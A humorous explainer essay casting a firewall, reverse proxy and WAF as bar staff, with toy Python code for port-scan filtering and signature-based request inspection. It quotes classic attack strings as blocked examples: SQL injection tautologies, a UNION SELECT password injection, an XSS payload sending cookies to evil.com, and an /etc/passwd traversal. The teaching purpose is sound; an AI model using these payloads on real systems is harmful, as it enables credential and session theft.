The barman is Apache. Things get complicated.
Dramatis Personae
- Apache: Tired barman. Serves HTTP. Just wants to deliver drinks without getting pwned.
- Firewall: The bouncer. Old school. Judges people entirely by their shoes (port numbers).
- Proxy: The mysterious middleman. Wears a trenchcoat. Everyone talks to him instead of Apache.
- WAF: The paranoid sommelier. Reads every drink order three times looking for SQL.
It was a quiet Tuesday evening at The Open Port, a bar famous for its 24/7 uptime and surprisingly loose CORS policy. Apache was polishing glasses behind the counter, running on port 80 (and secretly port 443 when he was feeling fancy), when the door swung open and in walked three regulars.
Firewall went in first. He always went in first.
Act I: Firewall — The Bouncer Who Only Reads Name Tags
Firewall is what you might call a simple man. He stands at the door and checks two things: where you came from, and what door you knocked on. Port 22? You look shifty. Port 3389 from a Russian IP range? Absolutely not. Port 80? Come on in, friend — I don’t know you at all but the number checks out.
This is fine, mostly. One evening a ne’er-do-well named Nikolai Portscan tried rattling every door in the building in sequence — 1, 2, 3, 4 — looking for something unlocked. Firewall spotted the pattern immediately and dropped the connection. “Sorry son,” he said, not looking up from his clipboard, “we don’t do sequential port scans here.” Nikolai shuffled off into the darkness, muttering about nmap flags.
But here’s the thing about Firewall: he’s brilliant at the door and absolutely useless once you’re inside. His entire worldview is Layer 3 and 4. IP addresses. Port numbers. Protocols. Once someone is through the door with a valid ticket, Firewall considers his job done. He retires to a stool and watches football.
This is how a villain named Mallory Request walked in one evening. She had a perfectly legitimate port-80 knock, a cheerful “GET / HTTP/1.1”, and tucked inside her handbag, a payload that read:
GET /search?q=1' OR '1'='1
A classic SQL injection. Mallory had been doing this since 2003 and considered it practically vintage at this point.
Firewall waved her through. Port 80, clean IP, proper handshake — what was there to complain about? Apache, poor Apache, looked at Mallory’s order and started dutifully relaying it to the database. This is when things could have gone very wrong. This is also when the WAF stepped in — but we’ll get to her.
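The bouncer’s whole worldview in code, as an added example that is not part of the original essay: a toy layer-3/4 filter with a sliding-window detector for Nikolai’s sequential knocks, run over constructed connection attempts (the 192.0.2.0/24 range is a stand-in for “that IP range”, not a real blocklist). Mallory’s port-80 connection sails through because the filter never sees her query string.

```python
from collections import defaultdict

# Constructed connection attempts (timestamp, src_ip, dst_port); not from the page.
# 192.0.2.0/24 stands in for "that IP range" the bouncer dislikes.
CONNECTIONS = [
    (0.0, "198.51.100.7", 1),      # Nikolai, rattling doors in order
    (0.1, "198.51.100.7", 2),
    (0.2, "198.51.100.7", 3),
    (0.3, "198.51.100.7", 4),
    (1.0, "203.0.113.9", 80),      # Mallory: looks fine at layers 3 and 4
    (2.0, "192.0.2.55", 3389),     # RDP from the disliked range
    (2.5, "203.0.113.9", 443),
]
ALLOWED_PORTS = {80, 443}
BLOCKED_PREFIX = "192.0.2."

def scan_detector(window=1.0, run_length=4):
    """Flag a source that hits `run_length` consecutive ports (n, n+1, ...)
    within `window` seconds of each other."""
    history = defaultdict(list)            # src -> [(ts, port)]
    def check(ts, src, port):
        recent = [(t, p) for t, p in history[src] if ts - t <= window]
        recent.append((ts, port))
        history[src] = recent
        run = 1
        for (_, a), (_, b) in zip(recent, recent[1:]):
            run = run + 1 if b == a + 1 else 1
            if run >= run_length:
                return True
        return False
    return check

def filter_connections(conns=CONNECTIONS):
    """Verdict per attempt using only L3/L4 facts; payloads are never read."""
    is_scan = scan_detector()
    verdicts = []
    for ts, src, port in conns:
        if is_scan(ts, src, port):
            verdict = "DROP sequential scan"
        elif src.startswith(BLOCKED_PREFIX) and port == 3389:
            verdict = "DROP RDP from blocked range"
        elif port in ALLOWED_PORTS:
            verdict = "ACCEPT"
        else:
            verdict = "DROP port not allowed"
        verdicts.append((src, port, verdict))
    return verdicts
```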
Act II: Proxy — The Middleman With Trust Issues
Proxy never let anyone talk to Apache directly. This was not rudeness; it was a philosophy. “Apache,” Proxy explained once, over a warm glass of TLS 1.3, “is a precious resource. A sensitive soul. He doesn’t need to know who’s really asking.”
Proxy sat between the world and Apache, collecting all requests, stripping out personal details, forwarding things along, and handing back responses as if he’d made them himself. To the outside world, the bar’s address was Proxy’s address. Apache didn’t even show up on the seating chart.
This came in tremendously useful when a distributed menace known as The Mirai Grandchildren arrived — a botnet of 40,000 compromised smart toasters, fridges, and at least one sad Roomba, all hammering the bar with HTTP requests simultaneously in a DDoS attack of breathtaking scale.
The Mirai Grandchildren had done this to many establishments. Usually, the server collapsed under the load like a tired soufflé.
Not here. Proxy looked at the 40,000 incoming connections, yawned, and began load-balancing them across a cluster. Rate limits kicked in. Suspicious IPs got CAPTCHAs. The toasters — identifiable by their suspiciously uniform User-Agent strings — were quietly handed a 429 and told to come back later. Apache, blissfully unaware, continued serving drinks to the twelve or so legitimate customers who’d gotten through, none the wiser.
“Isn’t it exhausting, pretending to be everyone?” Apache asked Proxy once.
“I’m a reverse proxy,” Proxy replied. “Pretending to be everyone is literally the job description.”
What Proxy couldn’t do, however, was read the menu. He was brilliant at managing who was talking to Apache, but he took orders at face value. Which brings us to the evening’s real hero.
Act III: WAF — The Paranoid Sommelier
The Web Application Firewall is, charitably, a highly anxious professional. She had read the OWASP Top 10 so many times she could recite it as a lullaby. She trusted no one. She read every drink order like it was a ransom note.
When Bobby Tables Jr. walked in — son of the infamous Robert'); DROP TABLE Students;-- — he handed over what appeared to be a perfectly ordinary drink order: a GET request to /login with a username field that happened to contain ' UNION SELECT password FROM users--.
Bobby had been doing this professionally for years. He’d cleaned out entire customer databases with worse. He waited for the familiar sound of query results tumbling out.
WAF looked at the order. Then looked at it again. Then cross-referenced it against her ModSecurity ruleset, the OWASP Core Rule Set v3.3, and her own personal feelings about unsanitized input. She set it down on the bar.
“This order,” she announced, “contains a UNION SELECT.”
“It’s just my name,” Bobby said, sweating slightly.
“Your name,” WAF replied, “has a double dash at the end. That’s a SQL comment delimiter. You’re trying to truncate a query. I’ve seen this since PHP 4.” She handed him a 403 Forbidden and a glass of water. Bobby left.
WAF was similarly unmoved when Xavier Cross-Site tried to order a drink with a name that read <script>document.location='https://evil.com/?c='+document.cookie</script>. This was a stored XSS attack — Xavier’s plan was to get that script saved in the bar’s database, so that every future customer who viewed the menu would automatically hand over their session cookies to evil.com.
“You’ve HTML-encoded nothing,” WAF observed flatly, “and your exfiltration URL is not even HTTPS. Embarrassing.”
Xavier, a man who had once stolen sessions from a Fortune 500, felt shame for the first time in years.
Things got briefly exciting when Patricia Traversal asked for something from the cellar using the path ../../../../etc/passwd — a path traversal attack so old it was practically artisanal. WAF blocked it without looking up. “Directory traversal attempts get normalized and rejected,” she said, refilling her coffee. “This has been standard since 2001. Patricia, I’ve blocked you fourteen times this month.”
“Worth a shot,” Patricia muttered, and left through a side door that was, thankfully, also monitored.
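What the sommelier actually does with each order, as an added example that is not the essay’s own code nor ModSecurity’s: percent-decode, resolve “..” against the web root, and run the decoded fields past a few signature rules modelled on the four payloads in this act. The rule regexes, rule names and sample orders are constructed for illustration; the OWASP Core Rule Set the text mentions is far larger, and a WAF complements rather than replaces parameterized queries and output encoding in the application.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Signature checks loosely modelled on what the story's WAF objects to; a teaching stand-in.
RULES = [
    ("sqli-union", re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)),
    ("sqli-tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("sqli-comment-tail", re.compile(r"--\s*$")),
    ("xss-script", re.compile(r"<\s*script\b", re.I)),
]

def normalize(value):
    # Percent-decode twice so a double-encoded %252e%252e is seen as "..".
    return unquote(unquote(value))

def escapes_root(path):
    # True if the path climbs above the web root once ".." is resolved.
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def inspect(request_line):
    # Return (status, rule) for a raw "GET /path?query" request line.
    _, _, target = request_line.partition(" ")
    parts = urlsplit(target)
    path = normalize(parts.path)
    if escapes_root(path):
        return ("403", "path-traversal")
    # parse_qsl decodes once; normalize again to catch double encoding.
    values = [normalize(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    for field in [path] + values:
        for name, pattern in RULES:
            if pattern.search(field):
                return ("403", name)
    return ("200", None)

# Constructed orders from the story's regulars (not captured traffic).
ORDERS = [
    "GET /search?q=1%27%20OR%20%271%27%3D%271",                             # Mallory
    "GET /login?username=%27%20UNION%20SELECT%20password%20FROM%20users--",  # Bobby
    "GET /order?name=%3Cscript%3Edocument.cookie%3C/script%3E",             # Xavier
    "GET /cellar/../../../../etc/passwd",                                   # Patricia
    "GET /menu/../specials?q=dry%20martini",                                # a regular
]

def review(orders=ORDERS):
    return [inspect(o) for o in orders]
```

The last order shows that resolving “..” is not the same as banning it: /menu/../specials stays inside the web root and is served.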
Epilogue: A Balanced Ecosystem
At closing time, Firewall, Proxy, and WAF sat down at the bar. Apache poured three drinks and leaned on the counter.
“You know,” Apache said, “some nights I wonder what would happen if only one of you showed up.”
“Without me,” said Firewall, “Nikolai Portscan would have found the MongoDB port you left open in 2019 and still haven’t closed.”
Apache said nothing. The MongoDB port was a sensitive subject.
“Without me,” said Proxy, “your real IP address would be public, the Mirai Grandchildren would have your home address, and you’d have collapsed under your third DDoS by February.”
“And without me,” said WAF, producing a stack of blocked request logs roughly the thickness of a novel, “your user database would belong to Bobby Tables Jr., your admin panel would be running Xavier’s cryptominer, and Patricia Traversal would be reading your /etc/shadow file as bedtime reading.”
Apache looked at the three of them. He looked at the logs. He looked at the small laminated sign above the bar that read “defence in depth” — a phrase he’d never fully appreciated until this moment.
“Same time tomorrow?” he asked.
“We never left,” said WAF.
No actual web servers were harmed in the writing of this essay. The author recommends running all three in production. Firewall alone is not a security strategy; it is a starting point, and a humble one. Also, please close your MongoDB port.
